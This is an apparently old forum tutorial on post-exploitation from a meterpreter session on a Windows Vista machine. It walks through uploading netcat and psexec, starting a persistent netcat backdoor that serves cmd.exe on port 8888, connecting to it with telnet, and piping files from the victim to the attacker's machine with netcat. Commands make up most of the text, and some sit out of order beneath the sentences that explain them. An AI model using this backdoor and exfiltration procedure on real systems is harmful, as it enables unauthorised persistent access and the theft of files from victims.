This 'Howto' is written to explain post-exploitation file-transfers from vista box to BT3 box.
This process doesn't work if the windows firewall is on. Somebody has to research and find a way to turn it off during the meterpreter session.
I'm assuming that:
1) You are testing this with your own machines or you have permission to penetrate the vista box.
2) You've already got a meterpreter session running. If not, may be this one can help: http://forums.remote-exploit.org/showthread.php?t=19129
3) You've downloaded nc (netcat) for windows. If not, download: http://joncraton.org/media/files/nc111nt.zip
4) You've downloaded psexec.exe to execute process remotely. If not, download: http://download.sysinternals.com/Files/PsTools.zip
Now, we've got our tools. Let's start with uploading the required files. They can be uploaded to the root folder or make a new folder by mkdir command. Say, we like to upload our files in c:\xxx folder of the victim (vista) box. So, go to c drive & prepare the folder.
The ls will show you that the folder has been created.
Open root directory of BT3 box and unzip the nc111nt.zip & PsTools.zip files.
Uploading the files
We just need 2 files. Upload them:
The ls will show you that the files have been uploaded.
upload /root/nc111nt/nc.exe nc.exe
upload /root/PsTools/psexec.exe psexec.exe
Opening the backdoor
Open a command shell by entering this on meterpreter field:
Run nc & keep it running (that's our backdoor) to keep 8888 port open:
execute -f cmd.exe -c -H -i
Here, username & password are admin username & password of vista box. You should already know this (coz you own the box, don't you). In the real world, it's possible to crack these but this is not covered in this tut.
psexec.exe \\127.0.0.1 -u username -p password c:\xxx\nc.exe -L -d -e cmd.exe -p 8888
Using backdoor to transfer file
OK...now as we've got our door, you can press Ctrl+C to terminate command shell & then type exit to close meterpreter session. Open a fresh konsole & use telnet to connect to the victim anytime:
Here 192.168.x.x is victim's IP address. In my case, it's 192.168.1.2
telnet 192.168.x.x 8888
You should see:
We will call this "Shell"
Connected to 192.168.1.2.
Escape character is '^]'.
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.
Files can be transferred from any location of vista box to any location in the BT3 box as long as correct file path is provided.
To receive the xxxx.txt file in BT3 box to yyyy directory in root, first prepare BT3 box. Open another konsole & enter:
Now, to send the file from zzzz folder within C drive of Vista Box, go to the "Shell", & enter:
nc -vv -l -p 10000 > /root/yyyy/xxxx.txt
Here, 192.168.y.y is BT3 box (attacker) IP address.
nc 192.168.y.y 10000 < C:\zzzz\xxxx.txt
The file should be downloaded to desired folder.